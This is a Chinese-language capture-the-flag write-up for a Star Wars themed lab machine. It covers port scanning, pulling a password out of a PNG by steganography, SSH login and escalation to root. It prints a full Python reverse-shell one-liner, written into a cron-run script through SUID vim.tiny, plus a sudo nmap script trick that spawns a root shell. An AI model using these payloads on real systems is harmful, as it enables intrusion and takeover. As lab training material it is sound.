StarWars_Epi1_CTF靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 06:54 EDT
Nmap scan report for 192.168.56.147
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:83:80:40 (Oracle VirtualBox virtual NIC)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 06:54 EDT
Nmap scan report for 192.168.56.147
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4c:53:4d:b2:26:ee:a5:10:d4:be:99:84:2a:9a:aa:11 (RSA)
|   256 95:d7:a4:e0:74:63:4b:08:b0:a8:8c:dc:e1:f8:91:25 (ECDSA)
|_  256 1d:07:d1:3d:99:02:f0:04:ba:23:c3:a4:fd:0d:3d:91 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:83:80:40 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.147                            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 06:55 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.147
Host is up (0.00025s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
| http-enum: 
|   /robots.txt: Robots file
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /manual/: Potentially interesting folder
MAC Address: 08:00:27:83:80:40 (Oracle VirtualBox virtual NIC)

Web 渗透

先看 robots.txt

Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG. 

文字比较乱，搜了一下第一行，没发现什么有价值的信息，或许也可能是作为字典，后续没别的思路了再尝试。

可能是用户名或者密码，记录下来，看看 wordpress 目录

wordpress 无收获，看看 admin 目录

源码中没什么东西，而且登录验证的 php 文件不存在，没法爆破

网站根目录中是两张图片，一张 jpg，一张 png，网页源码中有一段编码后的字符串，试一试 base64 编码，得到一串二进制字符串，再试一试二进制解码，得到真正有意义的字符，但是却不是我们需要的

查看 images 目录

发现一个有意思的事情，png 图片明显比 jpg 图片大得多，猜测可能有隐写的信息

png 图片隐写

使用 zsteg 工具进行测试

┌──(kali㉿kali)-[~/Downloads/StarWars_Epi1_CTF]
└─$ zsteg yoda.png 
b1,b,lsb,xy         .. file: OpenPGP Secret Key
b1,rgb,lsb,xy       .. text: "the real password is babyYoda123"
b2,r,msb,xy         .. text: "@@PTAT@U"
b2,bgr,msb,xy       .. text: "Q@DEADET"
b2,rgba,lsb,xy      .. text: "C{/'kk?'"
b3,b,lsb,xy         .. text: "!$u86Kri4"
b4,r,msb,xy         .. text: "A&W#Ff&b5!"
b4,g,lsb,xy         .. text: "DhTS6BTgd107R'Vc"
b4,g,msb,xy         .. text: "6%a0g!f&b5!"
b4,b,msb,xy         .. text: "RdT% \"FD1a"
b4,rgb,lsb,xy       .. text: "n,HnJJL&"
b4,rgb,msb,xy       .. text: "CRfgvf'2\"cvU4#"
b4,bgr,lsb,xy       .. text: ".hLNjJ,F"
b4,bgr,msb,xy       .. text: "VBgvfg6\"#rfT%3"
b4,rgba,lsb,xy      .. text: "so/O@OPo.O"
b4,abgr,msb,xy      .. text: "S/7_&?a_B"

得到了密码，而这个网站的登录界面是无法正常进行验证的，只能从 22 端口进行考虑。同时我们还收集到了 han 和 skywalker 两个字符串，猜测可能是用户名。

SSH 登录

接下来我手动尝试了 r2d2, root, skywalker 和 han，其中 han 登录成功

┌──(kali㉿kali)-[~/Downloads/StarWars_Epi1_CTF]
└─$ ssh han@192.168.56.147
han@192.168.56.147\'s password: 
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 23 08:18:42 2020 from ::1
han@starwars:~$ whoami
han
han@starwars:~$ id
uid=1000(han) gid=1000(han) groups=1000(han)
han@starwars:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:83:80:40 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.147/24 brd 192.168.56.255 scope global dynamic noprefixroute enp0s3
       valid_lft 334sec preferred_lft 334sec
    inet6 fe80::a00:27ff:fe83:8040/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
han@starwars:~$ uname -a
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
han@starwars:~$ sudo -l
[sudo] password for han: 
Sorry, user han may not run sudo on starwars.

看看用户家目录是否有敏感文件

han@starwars:~$ ls -alih
total 32K
  170 drwxr-xr-x 4 han  han  4.0K Jul 23  2020 .
  193 drwxr-xr-x 5 root root 4.0K Jul 23  2020 ..
43122 -rw------- 1 han  han   483 Jul 24  2020 .bash_history
38236 -rw-r--r-- 1 han  han   220 Apr 18  2019 .bash_logout
 1748 -rw-r--r-- 1 han  han  3.5K Apr 18  2019 .bashrc
42430 drwx------ 3 han  han  4.0K Jul 23  2020 .gnupg
 1261 -rw-r--r-- 1 han  han   807 Apr 18  2019 .profile
41082 drwxr-xr-x 2 han  han  4.0K Jul 24  2020 .secrets

关注历史命令文件和 .secrets 文件夹

han@starwars:~$ cat .bash_history 
sudo su
ls -al
mkdir .secrets 
ls 
ls -al
cd .secrets/
ls -al
touch firsthalf.txt 
touch note.txt
echo first half of the password is: luke12 >> firsthalf.txt 
cat firsthalf.txt 
echo Darth knows everything >> note.txt 
exit
cd .secrets/
cat  firsthalf.txt 
exit
ls
cd .secrets/
ls
rm firsthalf.txt 
cat note.txt 
echo "r2d2 thinks you're a cewl kid, what about anakin?" > note.txt 
cat note.txt 
echo "Anakin is a cewl kid." > note.txt 
cat note.txt 
cd ..
su Darth
sudo -l
su Darth

han@starwars:~$ cd .secrets/
han@starwars:~/.secrets$ ls -alih
total 12K
41082 drwxr-xr-x 2 han han 4.0K Jul 24  2020 .
  170 drwxr-xr-x 4 han han 4.0K Jul 23  2020 ..
43245 -rw-r----- 1 han han   22 Jul 24  2020 note.txt
han@starwars:~/.secrets$ cat note.txt
Anakin is a cewl kid.

拿到了前一半的密码，和 “Anakin is a cewl kid.” 的提示，接下来看看别的用户的家目录

han@starwars:~/.secrets$ cd /home/Darth
han@starwars:/home/Darth$ ls -alih
total 44K
43137 drwxr-xr-x 5 Darth Darth 4.0K Jul 24  2020 .
  193 drwxr-xr-x 5 root  root  4.0K Jul 23  2020 ..
43125 -rw------- 1 Darth Darth 2.3K Jul 24  2020 .bash_history
43304 -rw-r--r-- 1 Darth Darth  220 Apr 18  2019 .bash_logout
43303 -rw-r--r-- 1 Darth Darth 3.5K Apr 18  2019 .bashrc
43305 drwx------ 3 Darth Darth 4.0K Jul 23  2020 .gnupg
 1419 -rw------- 1 Darth Darth   42 Jul 24  2020 .lesshst
 1415 drwxr-xr-x 3 Darth Darth 4.0K Jul 24  2020 .local
43302 -rw-r--r-- 1 Darth Darth  807 Apr 18  2019 .profile
 1420 drwxr-xr-x 2 Darth Darth 4.0K Jul 24  2020 .secrets
 1414 -rw-r--r-- 1 Darth Darth   66 Jul 24  2020 .selected_editor
han@starwars:/home/Darth$ cd .secrets/
han@starwars:/home/Darth/.secrets$ ls -alih
total 12K
 1420 drwxr-xr-x 2 Darth Darth  4.0K Jul 24  2020 .
43137 drwxr-xr-x 5 Darth Darth  4.0K Jul 24  2020 ..
 1425 -rwxrw-r-- 1 Darth anakin  105 Jul 24  2020 evil.py
han@starwars:/home/Darth/.secrets$ cat evil.py
# Let the fear flow through you every single minute

fear = 1
anger = fear
hate = anger
suffering = hate

Darth 有个定时每分钟执行任务的脚本，或许可以被利用，但是这个文件只有 anakin 组的用户才能修改，我只能读取。上传个 pspy 来确认这个定时脚本是运行的

2023/10/02 08:12:01 CMD: UID=0     PID=17682  | /usr/sbin/CRON -f 
2023/10/02 08:12:01 CMD: UID=0     PID=17683  | /usr/sbin/CRON -f 
2023/10/02 08:12:01 CMD: UID=1002  PID=17684  | /bin/sh -c python /home/Darth/.secrets/evil.py

看看 skywalker 的家目录

han@starwars:/home/skywalker$ cd .secrets/
han@starwars:/home/skywalker/.secrets$ ls -laih
total 12K
43115 drwxr-xr-x 2 skywalker skywalker 4.0K Jul 24  2020 .
37181 drwxr-xr-x 5 skywalker skywalker 4.0K Jul 24  2020 ..
39574 -rw-r----- 1 skywalker skywalker   50 Jul 24  2020 note.txt
han@starwars:/home/skywalker/.secrets$ cat note.txt 
cat: note.txt: Permission denied

没有读取权限，再去看看网站根目录

han@starwars:/tmp$ cd /var/www/html
han@starwars:/var/www/html$ ls
admin  images  index.html  r2d2  robots.txt  users.js  wordpress
han@starwars:/var/www/html$ cd wordpress
-bash: cd: wordpress: Not a directory
han@starwars:/var/www/html$ ls -alih
total 36K
 8085 drwxr-xr-x 3 root root 4.0K Jul 25  2020 .
 8084 drwxr-xr-x 3 root root 4.0K Jul 20  2020 ..
37079 -rw-r--r-- 1 root root 3.7K Jul 23  2020 admin
36973 drwxr-xr-x 2 root root 4.0K Jul 23  2020 images
36309 -rw-r--r-- 1 root root  548 Jul 23  2020 index.html
42292 -rw-r--r-- 1 root root 3.3K Jul 23  2020 r2d2
39330 -rw-r--r-- 1 root root  105 Jul 23  2020 robots.txt
41183 -rw-r--r-- 1 root root   16 Jul 23  2020 users.js
41060 -rw-r--r-- 1 root root   54 Jul 23  2020 wordpress

查看 SUID 和定时任务

han@starwars:/var$ find / -type f -perm -04000 -ls 2>/dev/null
   147279    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
   143107     52 -rwsr-xr--   1 root     messagebus    51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   390885     16 -rwsr-sr-x   1 root     root          14608 Mar  5  2019 /usr/lib/xorg/Xorg.wrap
   264227     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   143141     20 -rwsr-xr-x   1 root     root          18888 Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   129321     84 -rwsr-xr-x   1 root     root          84016 Jul 27  2018 /usr/bin/gpasswd
   129319     44 -rwsr-xr-x   1 root     root          44528 Jul 27  2018 /usr/bin/chsh
   132702     44 -rwsr-xr-x   1 root     root          44440 Jul 27  2018 /usr/bin/newgrp
   133176     36 -rwsr-xr-x   1 root     root          34888 Jan 10  2019 /usr/bin/umount
   143139     24 -rwsr-xr-x   1 root     root          23288 Jan 15  2019 /usr/bin/pkexec
   156384     56 -rwsr-xr-x   1 root     root          55400 Mar  6  2019 /usr/bin/bwrap
   132849     64 -rwsr-xr-x   1 root     root          63568 Jan 10  2019 /usr/bin/su
   136952   1176 -rwsrwsrwx   1 root     root        1200696 Jun 15  2019 /usr/bin/vim.tiny
   143296     36 -rwsr-xr-x   1 root     root          34896 Apr 22  2020 /usr/bin/fusermount
   176421   2844 -rwsr-xr-x   1 root     root        2911160 Dec 12  2018 /usr/bin/nmap
   133174     52 -rwsr-xr-x   1 root     root          51280 Jan 10  2019 /usr/bin/mount
   129322     64 -rwsr-xr-x   1 root     root          63736 Jul 27  2018 /usr/bin/passwd
   129318     56 -rwsr-xr-x   1 root     root          54096 Jul 27  2018 /usr/bin/chfn
   143313    152 -rwsr-xr-x   1 root     root         154352 Mar 21  2019 /usr/bin/ntfs-3g
   173131    156 -rwsr-xr-x   1 root     root         157192 Feb  2  2020 /usr/bin/sudo
   172781    380 -rwsr-xr--   1 root     dip          386792 Feb 20  2020 /usr/sbin/pppd

han@starwars:/home/Darth/.secrets$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

SUID 中 vim.tiny 和 nmap 或许有可以利用的地方

或许可以用于读取，写入一些原本没有读写权限的文件

SUID VIM 读写定时脚本反弹 shell

尝试修改 evil.py

han@starwars:/home/Darth/.secrets$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' > evil.py
-bash: evil.py: Permission denied
han@starwars:/home/Darth/.secrets$ vim.tiny evil.py  
han@starwars:/home/Darth/.secrets$ cat evil.py 
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

提前开启监听

┌──(kali㉿kali)-[~/Downloads/StarWars_Epi1_CTF]
└─$ sudo nc -lvnp 443                             
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.147] 37906
$ whoami
whoami
Darth
$ id
id
uid=1002(Darth) gid=1002(Darth) groups=1002(Darth),27(sudo),2000(anakin)
$ python -c "import pty;pty.spawn('/bin/bash')" 
python -c "import pty;pty.spawn('/bin/bash')"
Darth@starwars:~$ ls -alih
ls -alih
total 44K
43137 drwxr-xr-x 5 Darth Darth 4.0K Jul 24  2020 .
  193 drwxr-xr-x 5 root  root  4.0K Jul 23  2020 ..
43125 -rw------- 1 Darth Darth 2.3K Jul 24  2020 .bash_history
43304 -rw-r--r-- 1 Darth Darth  220 Apr 18  2019 .bash_logout
43303 -rw-r--r-- 1 Darth Darth 3.5K Apr 18  2019 .bashrc
43305 drwx------ 3 Darth Darth 4.0K Jul 23  2020 .gnupg
 1419 -rw------- 1 Darth Darth   42 Jul 24  2020 .lesshst
 1415 drwxr-xr-x 3 Darth Darth 4.0K Jul 24  2020 .local
43302 -rw-r--r-- 1 Darth Darth  807 Apr 18  2019 .profile
 1420 drwxr-xr-x 2 Darth Darth 4.0K Oct  2 09:26 .secrets
 1414 -rw-r--r-- 1 Darth Darth   66 Jul 24  2020 .selected_editor
Darth@starwars:~$ sudo -l       
sudo -l
Matching Defaults entries for Darth on starwars:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User Darth may run the following commands on starwars:
    (ALL) NOPASSWD: /usr/bin/nmap

sudo nmap 提权

借助 gtfobins 来查看提权手法，--interactive 参数由于版本问题，不支持，因此使用运行可控的 nmap 脚本来提权

Darth@starwars:~$ sudo /usr/bin/nmap --interactive
sudo /usr/bin/nmap --interactive
/usr/bin/nmap: unrecognized option '--interactive'
See the output of nmap -h for a summary of options.
Darth@starwars:~$ cd /tmp
cd /tmp
Darth@starwars:/tmp$ ls
ls
pulse-PKdhtXMmr18n
systemd-private-88d98199aeff4b95840bfa9330947e54-apache2.service-v542CT
systemd-private-88d98199aeff4b95840bfa9330947e54-ModemManager.service-HniTNs
systemd-private-88d98199aeff4b95840bfa9330947e54-systemd-timesyncd.service-K1oC4C
Darth@starwars:/tmp$ echo 'os.execute("/bin/sh")' > test
echo 'os.execute("/bin/sh")' > test
Darth@starwars:/tmp$ sudo /usr/bin/nmap --script=test
sudo /usr/bin/nmap --script=test
Starting Nmap 7.70 ( https://nmap.org ) at 2023-10-02 09:29 EDT
NSE: Warning: Loading 'test' -- the recommended file extension is '.nse'.
# whoami
root

寻找flag

# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:83:80:40 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.147/24 brd 192.168.56.255 scope global dynamic noprefixroute enp0s3
       valid_lft 364sec preferred_lft 364sec
    inet6 fe80::a00:27ff:fe83:8040/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
# uname -a
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
# cd /root
# ls -liah
total 376K
  195 drwx------ 16 root root 4.0K Jul 25  2020 .
    2 drwxr-xr-x 19 root root 4.0K Jul 20  2020 ..
 1258 -rw-------  1 root root 4.4K Jul 24  2020 .bash_history
  247 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
  142 drwx------  6 root root 4.0K Jul 22  2020 .cache
  175 drwxr-xr-x  7 root root 4.0K Jul 23  2020 .config
  209 drwxr-xr-x  2 root root 4.0K Jul 23  2020 Desktop
  148 -rw-r--r--  1 root root   35 Jul 20  2020 .dmrc
  258 drwxr-xr-x  2 root root 4.0K Jul 20  2020 Documents
  210 drwxr-xr-x  2 root root 4.0K Jul 22  2020 Downloads
37235 -rw-r--r--  1 root root  793 Jul 23  2020 flag.txt
  171 drwx------  3 root root 4.0K Jul 20  2020 .gnupg
 1438 -rw-------  1 root root 2.6K Jul 25  2020 .ICEauthority
  404 drwxr-xr-x  3 root root 4.0K Jul 20  2020 .local
 1250 drwx------  5 root root 4.0K Jul 22  2020 .mozilla
  265 drwxr-xr-x  2 root root 4.0K Jul 20  2020 Music
 1273 -rw-r--r--  1 root root 240K Jul 24  2020 nmap-4.53.tar.bz2.2
  297 drwxr-xr-x  2 root root 4.0K Jul 20  2020 Pictures
  246 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
  254 drwxr-xr-x  2 root root 4.0K Jul 20  2020 Public
36714 drwx------  2 root root 4.0K Jul 22  2020 .ssh
  212 drwxr-xr-x  2 root root 4.0K Jul 20  2020 Templates
  308 drwxr-xr-x  2 root root 4.0K Jul 20  2020 Videos
  173 -rw-------  1 root root   53 Jul 25  2020 .Xauthority
  518 -rw-r--r--  1 root root  11K Jul 25  2020 .xfce4-session.verbose-log
  474 -rw-r--r--  1 root root  19K Jul 24  2020 .xfce4-session.verbose-log.last
 1271 -rw-------  1 root root 3.0K Jul 25  2020 .xsession-errors
  174 -rw-------  1 root root 3.4K Jul 24  2020 .xsession-errors.old
# cat flag.txt
    .-.
                      |_:_|
                     /(_Y_)\
.                   ( \/M\/ )
 '.               _.'-/'-'\-'._
   ':           _/.--'[[[[]'--.\_
     ':        /_'  : |::"| :  '.\
       ':     //   ./ |oUU| \.'  :\
         ':  _:'..' \_|___|_/ :   :|
           ':.  .'  |_[___]_|  :.':\
            [::\ |  :  | |  :   ; : \
             '-'   \/'.| |.' \  .;.' |
             |\_    \  '-'   :       |
             |  \    \ .:    :   |   |
             |   \    | '.   :    \  |
             /       \   :. .;       |
            /     |   |  :__/     :  \\
           |  |   |    \:   | \   |   ||
          /    \  : :  |:   /  |__|   /|
      snd |     : : :_/_|  /'._\  '--|_\
          /___.-/_|-'   \  \
                         '-'

I hope you liked it Padawan :)